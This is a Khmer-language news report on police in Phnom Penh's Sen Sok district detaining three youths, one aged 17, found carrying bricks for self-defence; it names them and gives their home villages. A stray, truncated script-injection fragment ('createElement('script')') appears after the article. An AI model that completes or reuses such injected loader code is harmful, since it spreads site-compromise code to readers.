ព្រឹតិ្តការណ៍ថ្មីៗ

ដើរលេងសោះចាំបាច់អី ស្ពាយកាបូបដាក់ដុំឥដ្ឋ! ឃើញទេសមត្ថកិច្ចឃាត់ខ្លួនមែន!

2 ឆ្នាំ មុន 4 តូ សុផល

 ភ្នំពេញ ៖ យុវជន៣នាក់ទើបតែចេញមកពីក្លឹបត្រូវកម្លាំងអន្តរាគមន៍ពិសេសក្រុងសហការជាមួយកម្លាំងមូល ដ្ឋានឃាត់ខ្លួនឆែកឆេររកឃើញមានលាក់ទុកដុំថ្មនៅក្នុងកាបូប។កាលឃាត់ខ្លួននេះធ្វើឡើងកាលពីវេលាម៉ោង ១ៈ០០នាទីយប់ថ្ងៃទី២៨ខែកញ្ញា ឆ្នាំ ២០១៦ ត្រង់ចំនុចម្ដុំសាលារៀន យ៉ាម៉ាមិកូ ស្ថិតក្នុង់នៅ សង្កាត់ទឹកថ្លាខណ្ឌសែនសុខ។

ជនសង្ស័យទី១មានឈ្មោះ គាំង ភារម្យ ភេទប្រុស អាយុ ២០ឆ្នាំ មុខរបរ និសិត្សឆ្នាំទីមួយ ស្នាក់នៅផ្ទះជួលម្ដុំទឹកថ្លា សង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ មានស្រុកកំណើតភូមិកោះចិន ឃុំកោះចិន ស្រុកពញ្ញាលឺ ខេត្តកណ្ដាល។

ទី២ ឈ្មោះ ជា ម៉េងសារ៉ាក់ អាយុ២០ឆ្នាំ មុខរបរសិស្ស ស្នាក់នៅនិងស្រុកកំណើតជាមួយគ្នា។

ទី៣ ឈ្មោះ ថៃ ទីណា អាយុ១៧ឆ្នាំ មុខរងរជាងជួសជុលរថយន្ត ស្នាក់នៅនិងស្រុកជាមួយគ្នា។

តាមប្រភពព័តមានពីកម្លាំងសមត្ថកិច្ចបានអោយដឹងថាមុនពលកើតហេតុកម្លាំងអន្តរាគមន៍ក្រុងសហការជាមួយកម្លាំងសមត្ថកិច្ចមូលដ្ឋាន បានធ្វើការចុះល្បាតតាមមូលដ្ឋានដើម្បីទប់ស្កាត់និងកាត់បន្ថយបទល្មើសដែលកើតដោយជនខិលខូចមួយចំនួនខណះពេលកំពុងតែល្បាតនោះស្រាប់តែម៉ូូតូមួយគ្រឿងម៉ាកនិចពណ័សពាក់ស្លាកលេខ ភ្នំពេញ 1FJ -0193 ជិះគ្នាបីនាក់ពេលនោះកម្លាំងសមត្ថកិច្ចមានការសង្ស័យទៅលើអ្នកទាំងបីនាក់នោះ ក៍បានហៅឃាត់សួរនាំនិងឆែកឆេរក៍បានរកឃើញដុំឥដ្ឋពីរដុំនៅក្នុុងកាបូបស្ពាយរបស់ពួកគេក្រោយមកសមត្ថ កិច្ចបាននាំខ្លួនអ្នកទាំងបីយកមកប៉ុស្ដិ៍នគរបាលរដ្ឋាបាលទឹកថ្លា ដើម្បីធ្វើការសួរនាំ បើតាមសម្ដីរបស់ជនសង្ស័យទាំងបីនាក់បានអោយដឹងថាមុនពេលកើតហេតុរូបគេទើបតែចេញមកពីក្លឹបប្លូហ្សូននៅម្ដុំភ្នំពេញថ្មី ក្រោយមកពួកគេបានជូនមិត្តភក្ដិម្នាក់ត្រលប់មកផ្ទះវិញហើយក្រោយមកក៍បានជួបកម្លាំងសមត្ថកិច្ចធ្វើការឆែកឆេរនិងនាំខ្លួនពួកគាត់មកដោយសារតែពួកគាត់មានលាក់ដុំឥដ្ឋនៅក្នុងកាបួបស្ពាយហើយដុំឥដ្ឋដែលគេទុកក្នុងកាបូបនេះគឺទុកសំរាប់ការពារខ្លួនតែប៉ុនោះទេ ក្រោយពីធ្វើការសាកសួររួចមកអ្នកទាំងបីរួមទាំងវត្ថុតាងបានត្រូវសមត្ថកិច្ចកសាងសំណុំរឿងបញ្ជូនទៅអធិការដ្ឋានខណ្ឌសែនសុខរងចាំការចាត់ការទៅតាមនីិតិវិធី ៕

var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!